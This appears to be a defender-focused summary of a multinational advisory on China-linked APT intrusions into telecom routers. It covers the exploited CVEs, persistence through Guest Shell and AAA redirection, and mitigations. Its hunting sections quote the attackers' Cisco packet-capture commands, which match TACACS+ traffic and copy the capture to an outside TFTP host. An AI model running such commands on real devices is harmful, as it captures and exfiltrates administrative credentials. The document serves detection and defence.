China-Linked APT Attacks Target Core Routers: CVEs, Persistence, and Mitigations

China-linked state actors have spent the last several years systematically compromising backbone and edge networking equipment — from provider-edge routers to customer-facing devices — to build a global espionage capability that steals subscriber metadata, intercepts authentication traffic, and creates persistent covert collection paths across peering and transit links. This coordinated international advisory paints a clear and urgent picture: adversaries are weaponizing unpatched, Internet-facing network infrastructure, abusing built-in router features (SPAN/ERSPAN/Embedded Packet Capture, Guest Shell/containers, SNMP, TACACS+/RADIUS) and network trust relationships to capture communications and credentials at scale, and to mirror or redirect customer traffic into actor-controlled collectors.

Background / Overview​

The multinational advisory, produced and co‑sealed by major western security agencies, documents intrusions dating back to at least 2021 and identifies a cluster of activity tracked in industry under names such as Salt Typhoon, OPERATOR PANDA, RedMike, UNC5807, and GhostEmperor — hereafter described generically as APT actors. The advisory attributes operations to entities and contractors that provide services to China’s intelligence apparatus, and warns of compromises across telecommunications, government, transportation, lodging, and military-support networks.
Key high‑level findings in the advisory:

• APT actors preferentially target network-edge and backbone routing infrastructure (PE/CE and core routers) to capture transit and administrative traffic.
• The actors exploit publicly known CVEs and weak configurations rather than relying on zero‑days, routinely scanning and chaining known vulnerabilities to obtain initial access and escalate privileges.
• Compromises are persistent and multi-faceted: the actors create local accounts, enable and use on‑device containers (e.g., Guest Shell), create or redirect TACACS+/RADIUS endpoints to actor-controlled servers, configure packet-capture and mirroring sessions, and establish GRE/IPsec tunnels to move data.

This coverage and the recommended mitigations are explicitly targeted at network defenders in telecommunications and critical infrastructure who must assume routers and interconnects are high‑value targets.

---

Anatomy of the attacks: how APT actors operate​

Initial access — exploitation and opportunism​

The advisory emphasizes exploitation of publicly known CVEs on Internet-exposed management interfaces and VPN/remote-access features. The APT actors have favored a set of high‑impact bugs in network and VPN appliances; the advisory calls particular attention to a handful of dangerous CVEs that have been observed in active exploit chains.
Independent vendor advisories confirm the seriousness of these vulnerabilities:

• CVE‑2023‑20198 / CVE‑2023‑20273 (Cisco IOS XE web UI) — Cisco’s investigation concluded CVE‑2023‑20198 can be used to bypass authentication to the web UI, enabling an attacker to create an administrative user; post‑exploit privilege elevation (CVE‑2023‑20273) was then used to write implants to the filesystem. Cisco lists these as critical and documents observed chaining. (sec.cloudapps.cisco.com)
• CVE‑2018‑0171 (Cisco Smart Install) — A long‑standing Smart Install remote code execution/DoS issue that still presents risk on unpatched, end‑of‑life devices; multiple nation‑state groups have previously weaponized it and vendors continue to urge deactivation/patching. (sec.cloudapps.cisco.com)
• CVE‑2024‑3400 (PAN‑OS GlobalProtect) — Palo Alto Networks assigned this a 10.0 severity and documented unauthenticated RCE against GlobalProtect in specific configurations; they reported active exploitation and provided hotfixes and mitigation guidance. (securityadvisories.paloaltonetworks.com)
• CVE‑2024‑21887 (Ivanti Connect Secure / Policy Secure) — Ivanti products have also been repeatedly targeted in the wild; vendors’ security bulletins and the advisory underscore that chaining authentication bypasses and web component issues remain a favored operational path for actors.

These vendor advisories corroborate the advisory’s central claim: attackers prefer fast returns via publicly known, high‑impact CVEs in VPN and router management features rather than exclusive reliance on bespoke zero‑day exploits. (sec.cloudapps.cisco.com, securityadvisories.paloaltonetworks.com)

Persistence and on‑box abuse​

Once on a network device, actors use multiple native features to persist and hide:

• Local account creation, SSH key insertion, and adjustment of ACLs to explicitly allow actor traffic; the advisory notes common naming/numbering patterns actors used when adding ACLs (e.g., “access-list 20”).
• Enabling management services on non‑standard high ports (e.g., SSH on non‑default 22x22/xxx22 schemes, HTTPS on 18xxx) to avoid simple signature detections.
• Guest Shell / Linux container usage on Cisco platforms to stage tools, run Python scripts (including publicly available exploit scripts), and conduct collection in an environment that may not be fully monitored by traditional device syslog. The Cisco documentation for Guest Shell (guestshell enable/run/disable/destroy) aligns with the advisory’s descriptions of how containers can be enabled, used for collection, and later destroyed to wipe traces. (test-salesconnect.cisco.com)
• SNMP SETs and configuration changes to direct TACACS+/RADIUS to actor IPs, mirror interfaces (SPAN/RSPAN/ERSPAN) or to create GRE/IPsec tunnels that ferry copied traffic to external collection points.

These practices have operational effects beyond a single router: they blur provenance in logs (local IPs and management VRF egress can hide actor source addresses), and they enable lateral moves across trust relationships (provider-to-provider peering or provider-to-customer links).

Collection: packet capture and credential harvesting​

The actors use native device PCAP functionality and traffic mirroring to capture authentication exchanges (TACACS+, RADIUS), BGP/Routing tables, and targeted customer traffic. The advisory provides concrete command sequences used to create captures (e.g., monitor capture mycap … match tcp any any eq 49; export bootflash:tac.pcap; copy bootflash:tac.pcap tftp://IP) and notes captured PCAP filenames such as mycap.pcap or tac.pcap — details that are directly actionable for threat hunters.
Why this matters: TACACS+ and RADIUS traffic frequently carries administrative authentication. If a device stores the shared secret in weak reversible encoding (Cisco Type 7) or if the operator’s AAA is misconfigured, the adversary can decrypt and re‑use credentials offline, dramatically expanding their foothold.

Exfiltration: peering abuse and tunnel concealment​

Rather than using a single, noisy C2 channel, actors frequently:

• Stage and encrypt archives on compromised systems and transfer them via actor SFTP clients to staging hosts; the advisory enumerates several custom SFTP client binaries (cmd1, cmd3, new2, sft) and includes YARA rules and hashes for detection.
• Leverage peering links and unmonitored interconnections to move bulk captures across ASNs or to conceal exfiltration in high‑volume NAT/pool traffic, or they tunnel via GRE/IPsec to actor infrastructure.

The practical impact is severe for telecommunications providers: an actor with access to routing edges can collect subscriber metadata and payloads, trace device movement through hospitality/transport networks, and map communications across jurisdictions.

---

Notable technical confirmations and vendor correlations​

• Cisco’s public advisory confirms the exploitation chain described by the authors: CVE‑2023‑20198 (authentication bypass) was weaponized to create administrative users, and an elevation bug (CVE‑2023‑20273) was used for root‑level implantation — a precise match for the advisory’s observed technique. (sec.cloudapps.cisco.com)
• Palo Alto’s PSIRT documentation for CVE‑2024‑3400 shows active exploitation against GlobalProtect configurations and explicitly lists hotfixes and mitigation steps; this confirms vendor-level danger and the need for immediate patching on affected PAN‑OS versions. (securityadvisories.paloaltonetworks.com)
• Cisco product documentation and community resources verify the Guest Shell lifecycle (enable → run bash/python → disable → destroy) and note that Guest Shell uses the management VRF and can run arbitrary Linux tooling — exactly the mechanism described in the advisory for actor staging and evasion. Administrators should treat Guest Shell as a privileged, auditable service. (test-salesconnect.cisco.com, blog.it-playground.eu)
• Public tool repositories (Stowaway on GitHub) document a ready‑made multi‑hop proxy that maps to the advisory’s description of multi‑hop encrypted relays and SOCKS5 forwarding used by actors to obscure origin and provide operator shells. That tool’s features (multi‑node relays, SOCKS5, port reuse) are consistent with the advisory’s references to STOWAWAY‑style tradecraft. (github.com)

These independent confirmations (vendor advisories plus public tooling) substantiate the advisory’s technical claims about exploited CVEs, container abuse on routers, and multi‑hop proxying.

---

Threat hunting: prioritized detection playbook​

The advisory provides an operational checklist for defenders. The following is a condensed, prioritized playbook network teams should action immediately.

• Inventory & Patch (first 72 hours)
• Identify all Internet‑facing networking appliances (routers, firewalls, VPN gateways) and confirm firmware/software versions.
• Prioritize installation of vendor hotfixes for the CVEs flagged in the advisory (CVE‑2023‑20198/CVE‑2023‑20273, CVE‑2018‑0171, CVE‑2024‑3400, CVE‑2024‑21887) and any other known exploited CVEs. Vendor advisories provide fixed releases and hotfix guidance. (sec.cloudapps.cisco.com, securityadvisories.paloaltonetworks.com)
• Configuration & Management plane hardening
• Place management services in a dedicated management VRF or out‑of‑band network; apply CoPP / control‑plane ACLs and allowlist management station IPs only.
• Ensure SSH uses key‑based public‑key auth for admins, disable password auth where feasible, and require strong ciphers. Audit non‑default high‑port SSH/HTTPS listeners.
• Visibility & Logging
• Forward device syslog, AAA command accounting, and Guest Shell/container logs off‑box into an immutable SIEM. Alert on:
• Creation/start of on‑box packet captures (monitor capture … start, Embedded Packet Capture), especially matches for TACACS+ (TCP/49).
• New TACACS+/RADIUS server IPs that point outside approved management space.
• Unexpected SNMP SETs, SPAN/ERSPAN session definitions, or GRE/IPsec tunnel creations transiting peering edges.
• Hunt for container abuse
• Search for Guest Shell enablement (guestshell enable/run/disable/destroy), chvrf, dohost usage, and signs of service changes to systemd in XR host OS. Forward container journald logs to SIEM. (test-salesconnect.cisco.com)
• Detect actor tooling and staging
• Deploy YARA or file‑hash detection for the SFTP client binaries enumerated in the advisory (e.g., cmd1/cmd3/new2/sft) and monitor for suspicious uploads to external SFTP/TFTP servers.
• Peering & Routing validation
• Continuously audit BGP eBGP session filters, AS‑path filters, and maximum‑prefix settings at peering edges to detect unauthorized route steering, and enable TTL security (GTSM) and session protection.

---

Mitigations — concrete actions (technical)​

• Patch and update immediately: apply vendor fixes for all identified CVEs and prioritize GlobalProtect, Ivanti, Cisco IOS XE/NX‑OS, and other exposed products. Vendor PSIRTs provide exact fixed builds and hotfix guidance. (securityadvisories.paloaltonetworks.com, sec.cloudapps.cisco.com)
• Disable unnecessary features: disable Cisco Smart Install, Guest Shell (when not required), ss hd_operns services on IOS XR (and verify they are not listening on TCP/57722), and any management HTTP/HTTP servers unless strictly required and bound to the management VRF.
• Management plane isolation: place AAA, SNMP, syslog, NetFlow/IPFIX collectors, and jump servers on a dedicated management VRF with strict egress controls; deny default egress and allow only specific collectors.
• SNMP hardening: use SNMPv3 with authPriv only, change default community strings, restrict SNMP SETs and writable MIBs, and monitor for SNMP SET activity targeting AAA/TACACS+.
• Logging and telemetry: centralize logs, enable AAA command accounting for privileged CLI actions, and retain logs for a period sufficient for forensic investigation.
• Routing safeguards: enforce strict BGP filters, maximum prefix limits, and deny default/broad routes on eBGP sessions; monitor for unexpected route changes and policy alterations.

---

Operational considerations and risks​

• Partial remediation risks: the advisory warns that partial or uncoordinated actions can alert persistent operators, causing them to hide activity or pivot to other compromised nodes. Threat response should be planned, coordinated, and — where possible — simultaneous eviction across known compromised environments to avoid tipping adversaries.
• Cross‑jurisdiction complexity: because actors exploit peering and provider links, remediation often involves multiple operators and national jurisdictions. Telecommunication providers should prepare cross‑party incident response processes and legal channels for coordinated takeover/eviction and evidence collection.
• Attribution nuance: the advisory attributes activity to China‑aligned groups and lists associated corporate entities cited by the authoring agencies. Those attributions are the view of the participating governments and are relevant to policy response; however, operational detection and mitigation should be guided by technical indicators and proven compromises rather than geopolitical attribution alone. Where the advisory links perpetrators to specific companies, treat that attribution as a government assessment and follow legal/regulatory guidance when acting on it.

---

The telecom sector: why routers matter more than endpoints​

Network edge and backbone devices aggregate massive volumes of sensitive traffic — administrative, signaling, and subscriber sessions. Compromise of these devices enables:

• Large‑scale passive data collection (PCAP of management/authentication traffic and customer flows).
• Covert redirection or mirroring of traffic to actor collection points over peering/transtional links.
• Long‑term strategic access to subscriber metadata that can reveal movement, associations, and communications patterns across services and geographies.

For national security, economic espionage, and privacy protection, this class of compromise is high‑impact: defenders must treat router hardening and management‑plane telemetry as top‑tier risk reduction.

---

Detection signatures and hunting artifacts (practical examples)​

• Hunt for evidence of PCAP commands: monitor logs and commands like:
• monitor capture mycap interface <if> both
• monitor capture mycap match ipv4 protocol tcp any any eq 49
• monitor capture mycap export bootflash:tac.pcap
• copy bootflash:tac.pcap tftp://<IP>/tac.pcap
  These exact command sequences and filenames (mycap, tac.pcap, 1.pcap) were observed and should be high‑priority alerts.
• Watch for TCP/57722 flows to IOS XR hosts (sshd_operns) — any unexpected inbound on that port should be treated as high risk. Audit XR host services for sshd_operns and confirm it is disabled unless explicitly required.
• Detect non‑default management listeners:
• SSH on port patterns like 22x22 or xxx22
• HTTPS bound to high ports like 18xxx
• Alerts when such listeners are reachable from outside the management VRF.
• File detections: deploy YARA rules or hash lists for SFTP/staging binaries found in the advisory (cmd1/cmd3/new2/sft) and monitor for their execution on any on‑box container or admin workstation.

---

Conclusion — what defenders must do now​

The advisory is a clarion call: network devices are not low‑risk plumbing — they are high‑value targets whose compromise yields asymmetric intelligence returns for state actors. The path forward for network defenders is clear and urgent:

• Treat vendor advisories and the list of exploited CVEs as operational priorities and patch immediately. (sec.cloudapps.cisco.com, securityadvisories.paloaltonetworks.com)
• Isolate, harden, and audit the management plane (VRFs, CoPP, AAA, SNMPv3) and maintain end‑to‑end visibility (off‑box logging, AAA accounting, telemetry).
• Hunt for the concrete indicators and command sequences documented in the advisory (PCAP commands, Guest Shell lifecycle events, TACACS+ redirections, unusual tunnels), and deploy YARA/signature detections for the SFTP/staging tools enumerated.
• Coordinate across providers and jurisdictions; operator-to-operator cooperation is essential when peering edges or shared infrastructure are implicated.

These measures will not remove every risk overnight, but rapid, prioritized remediation and improved telemetry will significantly raise the cost and complexity of similar campaigns and reduce the window of exposure for critical networks. The advisory’s technical details and vendor confirmations give defenders the concrete signals and fixes needed to act now.

---

Appendix: key artifacts and signposts to hunt immediately

• PCAP command strings and filenames (mycap, tac.pcap, 1.pcap).
• ss hd_operns / TCP/57722 listeners on IOS XR hosts.
• New TACACS+/RADIUS server IPs pointing off‑net.
• SPAN/RSPAN/ERSPAN session definitions or on‑box packet capture activity.
• Non‑default SSH/HTTPS listeners with 22x22/18xxx patterns.
• YARA rules and hashes for SFTP clients (cmd1, cmd3, new2, sft) as enumerated in the advisory.

Caveat on attribution: the advisory includes government attributions and company names associated with the activity. Those assessments inform national policy and response, but individual operators should prioritize verifiable technical indicators and legal channels when responding operationally.
Immediate actions by network operators, combined with vendor patching and international intelligence sharing, are the most reliable way to curtail the long‑term espionage capability described in the advisory and to protect subscriber privacy and critical service integrity.

---

Source: CISA Countering Chinese State-Sponsored Actors Compromise of Networks Worldwide to Feed Global Espionage System | CISA